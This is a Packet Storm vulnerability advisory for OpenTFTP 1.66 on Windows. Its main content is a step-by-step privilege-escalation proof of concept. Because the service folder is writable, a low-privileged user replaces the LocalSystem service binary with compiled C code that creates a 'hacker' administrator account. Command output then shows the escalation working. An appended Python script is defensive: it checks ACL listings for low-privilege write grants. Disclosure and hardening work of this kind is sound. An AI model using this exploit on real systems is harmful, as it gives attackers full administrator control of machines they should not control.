OpenTFTP 1.66 Local Privilege Escalation

13 Feb 2020 | Reported by boku | Type: packetstorm | Source: packetstormsecurity.com

OpenTFTP 1.66 Local Privilege Escalation - insecure service and folder permission

Code
`# Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation  
# Exploit Author: boku  
# Date: 2020-02-12  
# Vendor Homepage: https://sourceforge.net/projects/tftp-server/  
# Software Link: https://sourceforge.net/projects/tftp-server/files/tftp%20server%20single%20port/OpenTFTPServerSPInstallerV1.66.exe/download  
# Version: 1.66  
# Tested On: Windows 10 (32-bit)  
  
# About:   
# "MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges,   
# Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available."   
# Downloads: 43,284 This Week - https://sourceforge.net/projects/tftp-server/  
  
# Vulnerability Details:  
# On Windows, Open TFTP Server v1.66 suffers from insecure file & folder permissions.  
# This allows a low-privilege, local attacker to escalate their permissions to Administrator  
# by replacing the 'TFTPServer' service binary with a maliciously crafted binary executable.  
# The TFTP Server runs as an 'Auto_Start' service with 'LocalSystem' privileges after the  
# default installation. After the attacker has planted the malicious binary, the code will  
# be executed with System privileges on the next boot of the Windows device. See PoC below for details.  
  
## Service Information (there is also an Unquoted Service Path)  
C:\>sc qc TFTPServer  
SERVICE_NAME: TFTPServer  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 0 IGNORE  
BINARY_PATH_NAME : C:\OpenTFTPServer\OpenTFTPServerSP.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Open TFTP Single Port Server  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem  
  
## Insecure Folder Permission  
C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F  
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F  
BUILTIN\Users:(OI)(CI)(ID)R  
NT AUTHORITY\Authenticated Users:(ID)C  
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C  
  
## Insecure File/Service Permission  
C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)  
NT AUTHORITY\SYSTEM:(I)(F)  
BUILTIN\Users:(I)(RX)  
NT AUTHORITY\Authenticated Users:(I)(M)  
  
## Local Privilege Escalation Proof of Concept  
#0. Download & install Open TFTP Server v1.66  
  
#1. Create low privileged user & change to the user  
C:\Users\lowPrivUser>net user lowprivuser | findstr /i "Membership Name" | findstr /v "Full"  
User name lowPrivUser  
Local Group Memberships *Users  
Global Group memberships *None  
C:\>whoami  
mycomputer\lowprivuser   
  
#2. Move the Service EXE to a new name  
C:\OpenTFTPServer>move OpenTFTPServerSP.exe ~OpenTFTPServerSP.exe  
1 file(s) moved.  
  
#3. Create malicious binary on Kali Linux  
1) Download dependencies  
root@kali# apt install gcc-mingw-w64-i686 wine64 -y  
2) Add Admin User C Code  
root@kali# cat addAdmin.c  
#include<windows.h>  
int main(void){  
system("net user hacker mypassword /add");  
system("net localgroup Administrators hacker /add");  
WinExec("C:\\OpenTFTPServer\\~OpenTFTPServerSP.exe",0);  
return 0;  
}  
3) Compile Code  
root@kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o OpenTFTPServerSP.exe  
  
#4. Transfer created 'OpenTFTPServerSP.exe' to the Windows Host   
  
#5. Move the created 'OpenTFTPServerSP.exe' binary to the 'C:\OpenTFTPServer\' Folder  
C:\>move C:\Users\lowPrivUser\Desktop\OpenTFTPServerSP.exe C:\OpenTFTPServer\  
1 file(s) moved.  
C:\>dir C:\OpenTFTPServer | findstr "OpenTFTPServerSP.exe"  
02/12/2020 05:59 PM 288,659 OpenTFTPServerSP.exe  
02/12/2020 06:38 PM 221,560 ~OpenTFTPServerSP.exe  
  
#6. Reboot the Computer  
  
#7. Look at that new Admin  
C:\Users\lowPrivUser>net users hacker | findstr "Local name active"  
User name hacker  
Account active Yes  
Local Group Memberships *Administrators *Users  
  
C:\Users\lowPrivUser>net localgroup Administrators  
Alias name Administrators  
Comment Administrators have complete and unrestricted access to the computer/domain  
  
Members  
-------------------------------------------------------------------------------  
Administrator  
boku  
hacker  
`
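
A defender-side check for the condition shown in the two permission listings above, as an added example that is not part of the original advisory: it parses `cacls`/`icacls` output and reports ACEs that give low-privileged principals write-capable rights on a service binary or its folder. The principal list and the set of rights treated as write-capable are assumptions of this example.

```python
import re

# Principals that any local, non-admin account holds (assumed list for this example).
LOW_PRIV_RE = re.compile(
    r"(?:^|\s)(everyone|builtin\\users|"
    r"nt authority\\(?:authenticated users|interactive))$", re.I)
# Rights that permit renaming, deleting or overwriting: cacls F/C/W, icacls F/M/W
# plus specific rights. Which rights count as "write" is this example's choice.
WRITE_RIGHTS = {"F", "M", "C", "W", "D", "WD", "AD", "DE", "WDAC", "WO", "GW", "GA"}
MASK_RE = re.compile(r"(?:\([A-Z,]+\))*[A-Z]*")  # "(OI)(CI)(ID)F" or "(I)(RX,W)"

def risky_aces(acl_text):
    """Return (principal, write_rights, inherited, inherit_only) for every ACE
    that lets a low-privileged principal modify the object or its children."""
    findings = []
    for line in acl_text.splitlines():
        # The access mask follows the last colon; the first line of a listing
        # also carries the path before the principal, so match the line's tail.
        left, sep, mask = line.strip().rpartition(":")
        if not sep or not mask or not MASK_RE.fullmatch(mask):
            continue  # not an ACE line (e.g. `sc qc` output, blank lines)
        who = LOW_PRIV_RE.search(left)
        tokens = set(re.findall(r"[A-Z]+", mask))
        writes = sorted(tokens & WRITE_RIGHTS)
        if who and writes and "DENY" not in tokens:
            findings.append((who.group(1), writes,
                             bool(tokens & {"I", "ID"}), "IO" in tokens))
    return findings

# Listings copied from the advisory above (folder in cacls form, file in icacls form).
FOLDER_ACL = r"""C:\OpenTFTPServer BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C"""
FILE_ACL = r"""C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)"""
# Constructed: the same file after the Authenticated Users grant is removed.
HARDENED_ACL = r"""C:\OpenTFTPServer\OpenTFTPServerSP.exe BUILTIN\Administrators:(F)
NT AUTHORITY\SYSTEM:(F)
BUILTIN\Users:(RX)"""

if __name__ == "__main__":
    for name, acl in [("folder", FOLDER_ACL), ("file", FILE_ACL),
                      ("hardened", HARDENED_ACL)]:
        print(name, risky_aces(acl) or "no low-privilege write access")
```

Both flagged grants are inherited (`(I)`/`(ID)`), so removing them means disabling inheritance on `C:\OpenTFTPServer` and then removing the Authenticated Users entry, rather than editing the file's ACL alone.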
